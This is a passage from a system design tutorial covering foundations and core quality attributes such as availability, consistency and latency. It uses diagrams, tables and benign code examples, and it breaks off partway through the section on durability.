System Design
Index
- 1. Foundations of System Design
- 2. Computing and Networking Fundamentals
- 3. APIs and Service Interfaces
- 4. Data Storage and Database Design
- 5. Caching and Content Delivery
- 6. Scalability and Load Management
- 7. Asynchronous Processing and Messaging
- 8. Distributed Systems Theory
- 9. Reliability, Availability, and Fault Tolerance
- 10. Architectural Patterns and Styles
- 11. Security, Privacy, and Compliance
- 12. Observability and Operations
- 13. Performance and Cost Engineering
- 14. Large-Scale Data and Intelligent Systems
- 15. Applied System Design Case Studies
<a id="1-foundations-of-system-design"></a>
1. Foundations of System Design
This chapter builds the vocabulary and mental habits that every later chapter assumes: what "system design" actually means, the quality attributes that designs are judged by, how to turn a vague prompt into numbers you can defend, and how to reason about — and record — trade-offs. Get these foundations right and the rest of system design becomes applied engineering rather than guesswork.
<a id="11-what-system-design-is"></a>
1.1 What System Design Is
Before designing anything, you need to know what kind of decisions belong to system design, at what level of detail they are made, and what inputs (requirements, constraints, stakeholders) drive them.
System Design vs. Software Design
A single program running on one machine has a simple failure model: it either runs or it does not. The moment your product spans several machines, a network, and a database that outlives any single process, new questions appear that no amount of clean class design answers. What happens when the network drops a message? Where does data live, and who owns it? Which component becomes the bottleneck at ten times the traffic? Those questions are the subject of system design.
Software design is the craft of structuring code inside a component: classes, modules, interfaces, algorithms, and dependency direction. System design is the craft of structuring components into a working whole: services, data stores, queues, network boundaries, and the operational behaviour that emerges from them.
An analogy: software design is designing the interior of a house — where the rooms go, how you move between them, whether the kitchen layout works. System design is city planning — where the water mains, power grid, roads, and hospitals go, how the city keeps working when a substation fails, and how it absorbs a doubling of the population. Beautiful houses in a city with no water supply are still uninhabitable.
SOFTWARE DESIGN (inside one component) SYSTEM DESIGN (between components)
+----------------------------+ [Client]
| UrlShortenerService | |
| - encoder: Base62 | v
| - repo: UrlRepository | [Load Balancer]
| + shorten(url): String | / \
| + resolve(id): String | [API srv] [API srv]
+----------------------------+ | |
| +------+------+
v |
+----------------------------+ [Cache] | [ID generator]
| UrlRepository (interface) | \ | /
+----------------------------+ [Database]
|
[Replica / backups]
// Software design question: what is the right abstraction boundary here?
public interface UrlRepository {
void save(String id, String longUrl);
Optional<String> find(String id); // returns empty instead of null
}
// System design question: what does `find` actually do at 50k reads/second?
// - hit an in-process cache first? (latency vs. memory cost)
// - hit a shared cache cluster next? (extra hop, eviction policy)
// - fall through to a replica, not primary? (stale reads become possible)
// - what if the cache cluster is down? (thundering herd on the DB)
| Dimension | Software design | System design |
|---|---|---|
| Unit of thought | Class, module, function | Service, data store, network hop |
| Main risks | Coupling, unclear abstractions | Bottlenecks, partial failure, data loss |
| Typical artifact | Class diagram, interface, tests | Architecture diagram, capacity model, ADR |
| Failure model | Exception, wrong output | Timeout, partition, degraded mode, cascading failure |
| Feedback loop | Seconds (compile and test) | Days to months (load, growth, incidents) |
The two are not rivals: a system made of well-designed components is easier to split, replace, and scale, and a system with sane boundaries makes each component's code simpler.
Key Takeaways
- Software design structures code inside a component; system design structures components into a whole.
- System design exists because networks, machines, and data outlive single processes and fail partially.
- System-level artifacts are diagrams, capacity models, and decision records — not class hierarchies.
- Good system boundaries make component-level code simpler, and vice versa.
🧪 Practice
- Take a personal project and list every design decision you made. Sort each into "software design" or "system design", and note which category you spent the least time on.
- Draw the two-level picture (component internals and component topology) for a blogging platform with comments and image uploads.
- Interview: A candidate answers "design a URL shortener" by describing class names and methods. What is missing from that answer, and what would you ask next? (Hint: think about what changes when the service receives one billion redirects a day instead of ten.)
High-Level vs. Low-Level Design
Design happens at two zoom levels, and mixing them is one of the most common ways an interview or a design review goes off the rails. If you start naming database columns before agreeing on whether reads or writes dominate, you are polishing the details of a shape that may not survive.
High-level design (HLD) answers: what are the major pieces, how do they talk, where does state live, and how does data flow through the system? Its output is boxes and arrows with protocols and data stores labelled. Low-level design (LLD) answers: inside one box, what are the exact schemas, API signatures, algorithms, class structures, and edge-case rules?
Think of an architect's site plan versus the construction drawings for a single room. Both are needed. The site plan is what you argue about first, because moving a wall is cheap and moving a building is not.
HIGH-LEVEL DESIGN — "Notification service"
[Producer svc] --publish--> [Kafka: notif.events] --consume--> [Dispatcher]
|
+-------------------+----------------+
| | |
[Email wkr] [SMS wkr] [Push wkr]
| | |
[Email API] [SMS API] [APNs/FCM]
State: [Postgres: user_prefs] [Redis: dedup keys, 24h TTL]
Contract: at-least-once delivery, therefore consumers must be idempotent
-- LOW-LEVEL DESIGN: one box, fully specified
CREATE TABLE user_prefs (
user_id BIGINT PRIMARY KEY,
email_opt_in BOOLEAN NOT NULL DEFAULT TRUE,
sms_opt_in BOOLEAN NOT NULL DEFAULT FALSE,
quiet_from TIME NULL, -- local time; NULL = no quiet hours
quiet_to TIME NULL,
timezone TEXT NOT NULL, -- IANA name, e.g. 'Europe/Rome'
updated_at TIMESTAMPTZ NOT NULL DEFAULT now()
);
-- The read path is by user_id only, so the primary key index suffices;
-- no secondary index is added until a real query needs one.
# LOW-LEVEL DESIGN: the idempotency rule the HLD contract demands
def handle(event, redis, sender):
key = "notif:" + event["event_id"] # producer-supplied unique id
# SET NX returns False if the key already exists -> duplicate delivery
if not redis.set(key, "1", nx=True, ex=86_400):
return "duplicate-skipped" # at-least-once made safe
sender.send(event) # side effect happens once
return "sent"
| Question | HLD | LLD |
|---|---|---|
| Do we need a message queue at all? | yes | no |
| Which columns are indexed? | no | yes |
| Is the API REST or gRPC? | yes | no |
| What is the exact error payload shape? | no | yes |
| Which service owns user data? | yes | no |
| What is the retry backoff formula? | no | yes |
A practical rule for a 45-minute design interview: spend roughly the first two thirds at HLD, then let the interviewer pull you into one or two LLD areas (usually the data model or the hottest code path).
Key Takeaways
- HLD is components, contracts, and data flow; LLD is schemas, signatures, and algorithms.
- Settle HLD first — reversing a high-level decision is far more expensive.
- Every HLD arrow implies an LLD contract (format, retries, idempotency).
- In interviews, drive HLD yourself and drill into LLD where prompted.
🧪 Practice
- Classify these as HLD or LLD: choosing Cassandra over Postgres; choosing a composite partition key; putting a CDN in front of images; picking the exact JWT claim names.
- Draw an HLD for a food-delivery order flow, then produce the LLD schema for the
orderstable only.- Interview: You presented an HLD and the interviewer says "zoom into the write path". What three artifacts should you be ready to produce? (Hint: one describes structure, one describes an interface, one describes behaviour under failure.)
Functional Requirements
A functional requirement (FR) states what the system must do — an observable behaviour a user or another system can trigger and verify. FRs are the reason the system exists; everything else in design is in service of delivering them at acceptable quality.
The reason to write them down explicitly, even for a "simple" prompt, is that FRs determine the shape of the system. "Users can follow other users" implies a graph and a fan-out problem. "Users can search their own message history" implies an index. One sentence of FR can add an entire subsystem, so a design that starts before the FR list is agreed on is a design built on sand.
Good FRs read as actor + action + object + observable outcome, and are testable. Keep quality adjectives ("quickly", "reliably") out of them — those belong to non-functional requirements.
Prompt: "Design a ride-hailing app."
Core FRs (must have; these drive the architecture)
FR1 A rider can request a ride from a pickup to a dropoff location.
FR2 The system matches a request to exactly one nearby available driver.
FR3 Rider and driver can see each other's live location during a trip.
FR4 The system computes a fare and charges the rider when the trip ends.
FR5 A rider can view past trips and receipts.
Out of scope for v1 (state this explicitly!)
Ride pooling, scheduled rides, driver payout ledger, ratings and reviews.
# FRs map almost mechanically onto an API surface — a useful sanity check.
# FR1 -> POST /rides {pickup, dropoff} -> 202 + ride_id
# FR2 -> (internal) matching service assigns exactly one driver_id
# FR3 -> GET /rides/{id}/location (or a WebSocket stream)
# FR4 -> POST /rides/{id}/complete -> triggers fare calculation + payment
# FR5 -> GET /rides?rider_id=...&cursor=...
#
# If an FR maps to no endpoint, event, or background job, it is underspecified.
A useful discipline is to rank FRs before designing:
| Rank | FR | Architectural consequence |
|---|---|---|
| P0 | Request a ride | Write path, request store |
| P0 | Match to one driver | Geospatial index, uniqueness/locking |
| P0 | Live location | Streaming transport, very high write rate |
| P1 | Fare and payment | Transactions, idempotency, external PSP |
| P2 | Trip history | Read-optimized store, pagination |
Key Takeaways
- FRs describe observable behaviour: actor, action, object, outcome.
- Each FR tends to imply concrete architecture (index, queue, transport).
- Rank FRs; design for P0 first and explicitly defer the rest.
- Naming what is out of scope is as valuable as naming what is in.
🧪 Practice
- Write five functional requirements for a collaborative document editor, and mark which one is hardest to satisfy.
- For each FR you wrote, name the API endpoint or event it implies.
- Interview: Given the prompt "design Twitter", list the three FRs you would commit to in the first two minutes and justify the ranking. (Hint: pick the ones whose read/write pattern most shapes the storage design.)
Non-Functional Requirements
Two systems can satisfy identical functional requirements and still be wildly different: one serves 100 users from a laptop, the other serves 100 million across three continents under a 99.99% availability contract. Non-functional requirements (NFRs) capture how well the system must do what it does, and they — not the FRs — are what force load balancers, caches, replicas, queues, and multi-region topologies into your diagram.
The single most important property of an NFR is that it must be measurable. "The system should be fast" cannot be designed for, tested, or violated. "p99 read latency under 200 ms at 5,000 requests per second" can be.
A useful template: [metric] [operator] [target] [under what conditions] [measured where].
| Vague NFR | Measurable NFR |
|---|---|
| "Must be fast" | p99 latency < 200 ms for GET /timeline at 5k RPS, measured at the load balancer |
| "Must be available" | 99.95% monthly availability of the write API, excluding scheduled maintenance |
| "Must scale" | Sustains 10x current peak (50k RPS) with proportional cost and no code changes |
| "Must not lose data" | RPO <= 5 minutes and RTO <= 30 minutes for the loss of a full region |
| "Must be secure" | TLS 1.2+ in transit, AES-256 at rest, every PII read audited |
| "Must be cheap" | Infrastructure cost <= $0.60 per 1,000 API requests at steady state |
Categories to sweep through so you do not miss a whole class of requirement
Performance latency percentiles, throughput, time to first byte
Scalability growth headroom, elasticity, per-tenant limits
Availability uptime target, degradation modes, maintenance windows
Reliability correctness, RPO/RTO, retry and duplicate behaviour
Security authn/authz, encryption, audit trails, secret handling
Compliance GDPR/HIPAA/PCI, data residency, retention and deletion
Operability deploy frequency, rollback time, observability, on-call load
Cost unit economics, budget ceiling, cost per tenant
# An NFR you cannot turn into an assertion is a wish, not a requirement.
def assert_nfrs(results):
assert results.p99_ms < 200, f"p99 {results.p99_ms}ms exceeds 200ms"
assert results.error_rate < 0.001, f"error rate {results.error_rate}"
assert results.throughput_rps > 5000
# These same assertions live in the load-test suite and in the alert rules,
# which is how an NFR stays true after launch instead of only at design time.
NFRs also conflict with one another, which is why the next subchapter treats them as quality attributes to be traded off rather than boxes to be ticked: stronger consistency costs latency, higher availability costs money, tighter security costs developer velocity.
Key Takeaways
- NFRs specify quality: performance, availability, security, cost, operability, compliance.
- An NFR is only real if it is measurable and can fail a test.
- NFRs, far more than FRs, dictate topology (caches, replicas, regions).
- NFRs conflict; expect to negotiate targets, not to maximize all of them.
🧪 Practice
- Rewrite these as measurable NFRs: "search should feel instant", "the system should handle Black Friday", "we shouldn't lose orders".
- For a photo-sharing app, write one NFR in each of the eight categories listed above.
- Interview: You are told the target is 99.999% availability. What follow-up questions do you ask before accepting it? (Hint: think about what it costs, what exactly it is measured against, and whether every endpoint needs the same number.)
Constraints and Assumptions
No design happens in a vacuum. Constraints are conditions you do not get to choose — they narrow the solution space from outside. Assumptions are gaps in your knowledge that you fill in deliberately so you can keep moving, and label so they can be challenged later.
The discipline matters because unstated assumptions are the most common cause of designs that are technically excellent and practically wrong. If you silently assume a 100:1 read/write ratio and the real ratio is 1:1, your cache-heavy design collapses. State it out loud and someone corrects you in thirty seconds instead of three months.
Constraints come in recognisable families:
| Type | Examples |
|---|---|
| Business | Launch in 3 months; budget $20k/month; must support a free tier |
| Regulatory | EU user data stays in the EU; 7-year financial record retention |
| Technical | Must integrate a legacy SOAP billing system; on-premise only |
| Organizational | Four engineers, none with Kubernetes experience |
| Physical | Speed of light: roughly 150 ms round trip Europe to Australia |
| Contractual | A third-party API allows 100 requests/second, hard cap |
Physical constraints deserve special respect: no architecture beats the speed of light, so a globally synchronous, strongly consistent write will always pay cross-region round trips.
ASSUMPTION LOG — URL shortener (write this before designing)
A1 100M new URLs per month [source: PM estimate]
A2 Read:write ratio about 100:1 [assumed, VERIFY]
A3 Average long URL length about 100 bytes [assumed]
A4 Links never expire unless the user deletes [confirmed with PM]
A5 Traffic peaks at 3x the average [assumed, VERIFY]
A6 Custom aliases are a v2 feature [scope decision]
The VERIFY flags make risk visible: if A2 is wrong by 10x, the sizing and
cost of the entire caching layer changes.
# Make assumptions executable so their impact is testable, not rhetorical.
ASSUMPTIONS = {
"new_urls_per_month": 100_000_000,
"read_write_ratio": 100,
"peak_factor": 3,
}
def write_qps(a=ASSUMPTIONS):
# ~2.6M seconds in a month; round to 2.5M for easy mental arithmetic
return a["new_urls_per_month"] / 2_500_000
def peak_read_qps(a=ASSUMPTIONS):
return write_qps(a) * a["read_write_ratio"] * a["peak_factor"]
print(round(write_qps()), round(peak_read_qps())) # 40 12000
# Change one assumption, re-run, and watch which parts of the design move.
Key Takeaways
- Constraints are imposed on you; assumptions are chosen by you and must be labelled as such.
- Unstated assumptions are the top cause of confidently wrong designs.
- Keep an assumption log with a source and a "verify" flag per entry.
- Physical limits (speed of light, disk seek time) are non-negotiable.
🧪 Practice
- List five constraints that would apply to a hospital records system but not to a photo-sharing app.
- Write an assumption log for "design a food delivery app" with at least six entries, each tagged confirmed or assumed.
- Interview: You assume a 100:1 read/write ratio and the interviewer says "actually it's 1:1". Which parts of your design change first? (Hint: consider what caching buys you when almost every request mutates state.)
Stakeholders and Design Goals
A system has more customers than its users. Product managers want features shipped; end users want speed; the on-call engineer wants the thing to page rarely and be debuggable at 3 a.m.; finance wants predictable spend; security and legal want data handled correctly. Each group judges the same design by a different metric, and those metrics conflict.
Identifying stakeholders early does two things. It surfaces requirements you would otherwise miss (nobody writes "must be debuggable" on a feature ticket until after the first outage), and it gives you a defensible way to break ties: when two stakeholders' goals collide, you appeal to the priority order, not to the technical detail.
| Stakeholder | Cares about | Metric they judge you by |
|---|---|---|
| End user | Speed, correctness, uptime | p95 latency, error rate |
| Product / business | Time to market, velocity | Lead time for change, roadmap slip |
| On-call engineer | Debuggability, blast radius | MTTR, pages per week |
| Finance | Predictable, proportional spend | Cost per active user or request |
| Security | Least privilege, auditability | Vulnerabilities, audit findings |
| Legal / compliance | Residency, retention, deletion | Audit result, data-request latency |
| Partner / API user | Stable contracts, clear errors | Breaking changes per year |
Turn these into an explicit, ordered set of design goals. The ordering is the whole point — an unordered list of goals gives no guidance when two of them pull apart.
DESIGN GOALS — internal payments service (ordered, v1)
G1 Correctness: never double-charge, never lose a settled payment
G2 Availability: 99.99% on the charge endpoint
G3 Auditability: every state transition reconstructable for 7 years
G4 Latency: p99 < 800 ms end to end
G5 Cost: < $0.002 per transaction
G6 Developer velocity: a new payment method integrated in < 2 weeks
Tie-break rule: the lower-numbered goal wins.
-> Faced with a faster path (G4) versus a guaranteed-once path (G1), take the
slower, safer path — and record why in the design doc.
# The same trade-off expressed as code the team can point at during review.
def on_charge_request(req, ledger, gateway):
# G1 outranks G4: record intent durably BEFORE calling the gateway, even
# though it adds a synchronous durable write to the hot path.
intent = ledger.record_intent(req.idempotency_key, req.amount)
if intent.already_settled:
return intent.result # replay-safe: no second charge
result = gateway.charge(req) # external call; may time out
ledger.record_result(intent.id, result) # crash here is reconcilable
return result
Key Takeaways
- Users are only one stakeholder; ops, finance, security, and legal also define real requirements.
- Each stakeholder judges the design by a different metric — collect them.
- Convert stakeholder concerns into an ordered list of design goals.
- The ordering is the tie-break rule you will lean on in every trade-off.
🧪 Practice
- List the stakeholders for an internal HR system and the one metric each would use to call it a success.
- Write an ordered set of five design goals for a public API product, then describe a concrete decision the ordering would settle.
- Interview: Product wants a feature that would drop availability from 99.99% to 99.9%. How do you frame the decision? (Hint: convert both sides into the same unit — minutes of downtime, revenue, or affected users.)
<a id="12-core-quality-attributes"></a>
1.2 Core Quality Attributes
Quality attributes are the dimensions along which every design is judged and traded off. Each has a definition, a way to measure it, and a characteristic cost — knowing all three is what lets you argue about designs with numbers instead of adjectives.
Scalability
Scalability is not "being fast". A system is scalable if it can absorb more work by adding more resources, at a cost that grows no worse than proportionally. A fast system that saturates at 1,000 requests per second and cannot be improved by adding hardware is not scalable; a slower system that handles 100x the load by adding 100x the machines is.
Start with the "why": load grows, and there are only two responses. Vertical scaling buys a bigger machine — simple, but bounded by the largest machine that exists and usually a single point of failure. Horizontal scaling adds more machines — effectively unbounded, but only works if the work can be split, which is the hard part.
Two laws govern how well splitting works. Amdahl's law says the speedup from parallelism is capped by the fraction of work that is inherently serial. The Universal Scalability Law adds a second, nastier term: coordination between nodes (locks, consensus, cross-shard queries) makes throughput decrease past some node count. This is why "just add servers" eventually stops helping and starts hurting.
Throughput vs. nodes
ideal (linear) .-'
.-'
.-' Amdahl (serial fraction caps it)
.-' ______________________
.-' ____/
.-' ____/ USL (coordination cost bends it down)
.-' ____/ ................
|___/........'''' ''''....
+----------------------------------------------> nodes
knee
def amdahl_speedup(serial_fraction, n):
"""Max speedup with n workers when `serial_fraction` cannot be parallelized."""
return 1 / (serial_fraction + (1 - serial_fraction) / n)
for n in (1, 10, 100, 1000):
print(n, round(amdahl_speedup(0.05, n), 1))
# 1 1.0 | 10 6.9 | 100 16.8 | 1000 19.6
# 5% serial work caps you at 20x no matter how many machines you buy.
# Design implication: hunt down the serial part (a global lock, a single
# sequence generator, one shared table) before buying more capacity.
| Aspect | Vertical scaling | Horizontal scaling |
|---|---|---|
| Ceiling | Largest available machine | Practically unbounded |
| Complexity | Low (no code changes) | High (sharding, coordination) |
| Failure impact | Single point of failure | Degrades gracefully |
| Cost curve | Superlinear at the high end | Roughly linear |
| Downtime to scale | Usually requires a restart | Add nodes live |
| Best for | Databases early on, simplicity | Stateless services, large scale |
Stateless components scale horizontally almost for free; state is what makes scaling hard, which is why so much of this curriculum is about data.
Key Takeaways
- Scalability is the ability to absorb load by adding resources at proportional cost — not raw speed.
- Vertical scaling is simple but capped; horizontal scaling is unbounded but demands splittable work.
- Amdahl's law caps speedup by the serial fraction; the USL shows coordination can make more nodes worse.
- Stateless services scale trivially; state is the real scaling problem.
🧪 Practice
- A service spends 10% of each request in a globally locked section. What is the maximum speedup from parallelism? Compute it with the code above.
- Name three things in a typical web application that are inherently serial and block horizontal scaling.
- Interview: Your API scales linearly to 20 servers, then throughput plateaus and p99 latency rises. What do you investigate first? (Hint: what do all 20 servers share?)
Availability
Availability is the fraction of time a system is able to serve requests successfully. It is stated as a percentage — the famous "nines" — but the percentage is meaningless until you say of what, measured how, and over what window. "99.9% availability" of a health-check endpoint is a very different promise from 99.9% of successful checkout requests measured at the client.
The formula is straightforward:
Availability = uptime / (uptime + downtime)
= MTBF / (MTBF + MTTR)
MTBF = mean time between failures (make failures rarer)
MTTR = mean time to recovery (make recovery faster)
MTTR is usually the cheaper lever. Halving recovery time improves availability exactly as much as doubling time between failures, and fast rollback, good runbooks, and automated failover are far more achievable than never failing.
| Availability | Downtime/year | Downtime/month | Downtime/week | Typical for |
|---|---|---|---|---|
| 99% | 3.65 days | 7.2 hours | 1.68 hours | Internal tools |
| 99.9% | 8.77 hours | 43.8 minutes | 10.1 minutes | Standard SaaS |
| 99.95% | 4.38 hours | 21.9 minutes | 5.04 minutes | Business-critical SaaS |
| 99.99% | 52.6 minutes | 4.38 minutes | 1.01 minutes | Payment, infrastructure |
| 99.999% | 5.26 minutes | 26.3 seconds | 6.05 seconds | Telco core, very rare |
Availability composes, and the arithmetic is unforgiving. Dependencies in series (every request needs all of them) multiply; redundant components in parallel multiply their failure probabilities, which is why redundancy is the primary tool for high availability.
from functools import reduce
def in_series(*avails):
"""All must be up: availabilities multiply -> the total is always lower."""
return reduce(lambda a, b: a * b, avails)
def in_parallel(*avails):
"""Any one suffices: failure probabilities multiply -> total is higher."""
return 1 - reduce(lambda a, b: a * b, [1 - x for x in avails])
# A request touching LB -> API -> DB -> cache, each 99.9%
print(round(in_series(0.999, 0.999, 0.999, 0.999) * 100, 3)) # 99.601
# Four "three nines" dependencies give you well under three nines overall.
# Three independent API replicas, each 99%
print(round(in_parallel(0.99, 0.99, 0.99) * 100, 4)) # 99.9999
# Redundancy is enormously effective — IF failures are truly independent.
That last caveat is the whole game: shared power, a shared config push, a shared dependency, or correlated overload breaks independence, and the parallel formula silently overstates your real availability.
Key Takeaways
- Availability = MTBF / (MTBF + MTTR); reducing MTTR is usually cheaper than increasing MTBF.
- Always state what is measured, from where, and over what window.
- Serial dependencies multiply availabilities down; parallel redundancy multiplies failure probabilities down.
- Redundancy only helps to the extent failures are independent.
🧪 Practice
- A request path has five services at 99.95% each. What is the end-to-end availability, and how many minutes per month is that?
- Your SLO is 99.9% monthly. You have used 30 minutes of downtime this month. How much error budget remains?
- Interview: How would you raise a service from 99.9% to 99.99% without rewriting it? (Hint: look at the MTTR side of the formula and at what is currently in series.)
Reliability
Availability asks "was it up?"; reliability asks "did it do the right thing?". A system can be perfectly available and deeply unreliable — returning stale balances, dropping one order in a thousand, or double-charging on retry. Users forgive a brief outage far more readily than a wrong number.
Formally, reliability is the probability that a system performs its intended function correctly for a given period under stated conditions. It covers correctness of results, absence of data loss or corruption, and correct behaviour under retries and partial failure.
The distinction matters because the two are improved by different means. Availability is improved with redundancy and fast failover. Reliability is improved with idempotency, checksums, transactions, validation, replication of data, backups, and testing under fault injection.
Available Not available
+------------------+------------------+
Reliable | Ideal | Down but honest: |
| | returns 503, no |
| | corrupted state |
+------------------+------------------+
Unreliable | The dangerous | Down and losing |
| quadrant: up and | data |
| quietly wrong | |
+------------------+------------------+
The top-right is recoverable. The bottom-left destroys trust silently.
# Unreliable: a retry after a timeout can charge the customer twice.
def transfer(account, amount, gateway):
return gateway.charge(account, amount) # no dedup, no record
# Reliable: idempotency key + durable record makes retries safe.
def transfer_safe(account, amount, key, db, gateway):
existing = db.get_transfer(key) # has this key been seen?
if existing:
return existing.result # replay the recorded outcome
db.insert_transfer(key, account, amount, status="PENDING") # durable intent
try:
result = gateway.charge(account, amount, idempotency_key=key)
db.update_transfer(key, status="DONE", result=result)
return result
except TimeoutError:
# Unknown outcome: leave PENDING for the reconciler to settle rather
# than guessing. Never silently retry a non-idempotent side effect.
raise
| Metric | Meaning | Improves by |
|---|---|---|
| MTBF | Mean time between failures | Better testing, redundancy, limits |
| MTTF | Mean time to failure (non-repairable) | Better components |
| MTTR | Mean time to repair/recover | Automation, runbooks, rollback |
| Error rate | Fraction of requests wrong or failed | Validation, idempotency, retries with backoff |
Key Takeaways
- Availability is "up"; reliability is "correct". They are improved by different mechanisms.
- Silent wrongness is worse than visible downtime — fail loudly.
- Idempotency, durable intent, and reconciliation are the core reliability patterns for side effects.
- Track MTBF and MTTR explicitly; they are the levers behind both attributes.
🧪 Practice
- Give an example of a system that is highly available but unreliable, and one that is reliable but poorly available.
- Make this operation idempotent: "append a comment to a post" called over a flaky network with client retries.
- Interview: A payment API times out after the charge succeeded downstream. What must the design guarantee, and how? (Hint: the client cannot distinguish "not done" from "done but the response was lost".)
Maintainability
Most of the money spent on a system is spent after it launches. Maintainability is the quality attribute that governs that cost: how easily people can operate, understand, and change the system over its lifetime. It is the attribute most often sacrificed under deadline pressure and the one whose absence is most expensive later.
It splits into three concerns:
- Operability — can the people running it keep it healthy? (Good telemetry, predictable behaviour, easy rollback, documented runbooks.)
- Simplicity — can a new engineer form a correct mental model quickly? (Managed complexity, clear abstractions, few surprises.)
- Evolvability — can it be changed safely? (Tests, loose coupling, stable contracts, small deployable units.)
The useful mental model is accidental versus essential complexity. Essential complexity comes from the problem (payments really do have chargebacks). Accidental complexity comes from your solution (three config systems, two RPC frameworks, a bespoke retry layer). Maintainability work is mostly the removal of accidental complexity.
Maintainability shows up in delivery metrics (DORA)
Deployment frequency how often you ship -> higher is better
Lead time for change commit to production -> lower is better
Change failure rate deploys causing incidents -> lower is better
Time to restore incident to recovery -> lower is better
These are outcome measures. If they are bad, the cause is usually
architectural, not individual.
# Low maintainability: policy, transport, and business rules entangled.
def process_order(order):
if order["type"] == "digital":
requests.post("https://fulfil.internal/d", json=order, timeout=3)
elif order["type"] == "physical":
requests.post("https://fulfil.internal/p", json=order, timeout=3)
# Adding a third type edits this function; testing it needs the network.
# Higher maintainability: one seam for policy, one for transport.
class OrderProcessor:
def __init__(self, handlers): # injected -> testable without network
self._handlers = handlers # {"digital": fn, "physical": fn}
def process(self, order):
handler = self._handlers.get(order["type"])
if handler is None:
raise UnsupportedOrderType(order["type"]) # explicit, not silent
return handler(order)
# A new order type is now a registration, not a modification.
Key Takeaways
- Maintainability = operability + simplicity + evolvability, and it dominates lifetime cost.
- Distinguish essential complexity (inherent) from accidental complexity (self-inflicted, removable).
- The DORA metrics make maintainability measurable rather than aesthetic.
- Seams — interfaces, injection points, stable contracts — are what make change cheap.
🧪 Practice
- Identify one piece of accidental complexity in a codebase you know and describe what removing it would cost and save.
- Write a runbook entry for "the queue consumer is lagging": symptoms, checks, actions, escalation.
- Interview: How would you measure whether an architecture change improved maintainability? (Hint: pick metrics that a stakeholder outside the team would also accept.)
Latency and Throughput
Latency is how long one operation takes. Throughput is how many operations complete per unit of time. They are related but independent: a system can have low latency and low throughput (a fast single-threaded service), or high latency and high throughput (a batch pipeline moving terabytes with a one-hour delay).
The analogy is a highway. Latency is how long your car takes to drive from A to B. Throughput is how many cars per hour the road carries. Adding lanes raises throughput without making any single trip faster; raising the speed limit cuts latency. And past a certain traffic density, adding cars makes everyone slower — the queueing effect that makes latency explode near saturation.
Little's Law ties the two together and is the single most useful formula in capacity work:
L = λ × W
L = average number of requests in the system (concurrency)
λ = arrival rate (throughput, requests/second)
W = average time in the system (latency, seconds)
Example: 2,000 RPS with 50 ms average latency
L = 2000 × 0.05 = 100 concurrent requests in flight
-> you need at least ~100 threads/connections, plus headroom.
Never describe latency with an average. Averages hide the tail, and the tail is what users feel — especially because a single page view often fans out to many backend calls, so the slowest of them sets the perceived latency.
def percentile(samples, p):
s = sorted(samples)
idx = min(int(len(s) * p / 100), len(s) - 1) # nearest-rank, clamped
return s[idx]
latencies = [10] * 990 + [2000] * 10 # 99% fast, 1% terrible
print(sum(latencies) / len(latencies)) # 29.9 <- mean looks fine
print(percentile(latencies, 50)) # 10
print(percentile(latencies, 99)) # 2000 <- the truth
# Tail amplification: if one page issues 20 parallel backend calls, the chance
# that at least one hits the p99 path is 1 - 0.99**20 = 18%.
print(round((1 - 0.99 ** 20) * 100, 1)) # 18.2
| Term | Definition | Typical target |
|---|---|---|
| p50 (median) | Half of requests are faster | Feels like "normal" speed |
| p95 | 1 in 20 requests is slower | Common SLO anchor |
| p99 | 1 in 100 requests is slower | Where tail problems surface |
| p99.9 | 1 in 1,000 requests is slower | Matters at high fan-out |
| Throughput | Completed operations per second | Sized from peak traffic |
Key Takeaways
- Latency is per-operation time; throughput is operations per unit time.
- Little's Law (L = λ × W) converts between concurrency, rate, and latency.
- Report percentiles, never averages; the tail is the user experience.
- Fan-out amplifies tails: many parallel calls make p99 the common case.
🧪 Practice
- A service handles 500 RPS with 200 ms average latency. How many requests are in flight on average? How many worker threads would you provision?
- Given the latency list
[5, 7, 9, 11, 900], compute mean, p50, and p99, then explain which one you would put in an SLO and why.- Interview: Your p50 is 20 ms and your p99 is 3 s. Name four plausible causes. (Hint: think about garbage collection, cold caches, lock contention, and one unlucky shard.)
Consistency
Consistency answers a deceptively simple question: after a write, what do subsequent reads see? On a single machine the answer is "the write". The moment data is replicated across machines, replicas diverge for some window, and you have to decide what to promise.
Why not always promise the strongest thing? Because strong consistency requires coordination, coordination requires round trips, and round trips cost latency and availability — a replica that cannot reach its peers must either block or serve possibly-stale data. That is the essence of the CAP and PACELC results covered in Chapter 8; here we only need the vocabulary.
Write W (value = 5) to the primary at t=0. Replica lag = 100 ms.
t=0 t=50ms t=100ms t=150ms
| | | |
W --> primary: 5 ... ...
replica: 4 -> replica: 5 replica: 5
^
|
A read routed here at t=50ms returns the OLD value 4.
Strong consistency: that read is not allowed to return 4
(route to primary, or block until replicated)
Eventual consistency: returning 4 is allowed; convergence is guaranteed
only "eventually"
| Model | Guarantee | Cost |
|---|---|---|
| Strong (linearizable) | Every read sees the latest committed write | Highest latency, lowest availability under partition |
| Sequential | All nodes see operations in the same order | Cheaper than linearizable |
| Causal | Causally related operations are seen in order | Good middle ground |
| Read-your-writes | A client always sees its own writes | Session-scoped, cheap |
| Monotonic reads | A client never sees time go backwards | Session-scoped, cheap |
| Eventual | Replicas converge if writes stop | Lowest latency, highest availability |
# A very common, very cheap compromise: read-your-writes via read routing.
def get_profile(user_id, session, primary, replica):
# If this session wrote recently, its own read must not go to a lagging
# replica; everyone else can enjoy the cheap replica read.
if session.wrote_within_ms(user_id, 500):
return primary.read(user_id)
return replica.read(user_id)
The practical skill is choosing per use case, not per system: a bank balance needs strong consistency, a "likes" counter is fine eventually consistent, and a user's own profile edit usually needs only read-your-writes.
Key Takeaways
- Consistency defines what a read may return after a write, once data is replicated.
- Stronger consistency costs latency and availability; there is no free version.
- Session guarantees (read-your-writes, monotonic reads) solve most perceived staleness cheaply.
- Choose a consistency level per operation, not once for the whole system.
🧪 Practice
- Classify each as needing strong or eventual consistency: account balance, view count, seat reservation, username availability check, follower count.
- Describe a user-visible bug caused by a lack of read-your-writes.
- Interview: Your feed shows a comment the user just posted as missing on refresh. Diagnose and fix without making all reads strongly consistent. (Hint: the guarantee needed is scoped to one session.)
Durability
Durability is the promise that once the system has acknowledged a write, that data will not be lost — not to a process crash, not to a disk failure, not to a data centre fire. It is distinct from availability (the data may be temporarily unreachable and still perfectly durable) and from consistency (a stale read is not a lost write).
The mechanics come down to two questions: how many independent copies exist, and when do you acknowledge the write relative to those copies being made? Acknowledging before the data is safely persisted trades durability for latency, and it is a trade some systems make deliberately.
Write acknowledgement points (fastest to safest)
1. In memory on one node -> lost on process crash
2. OS page cache on one node -> lost on machine power loss
3. fsync'd to disk on one node -> lost on disk/node loss
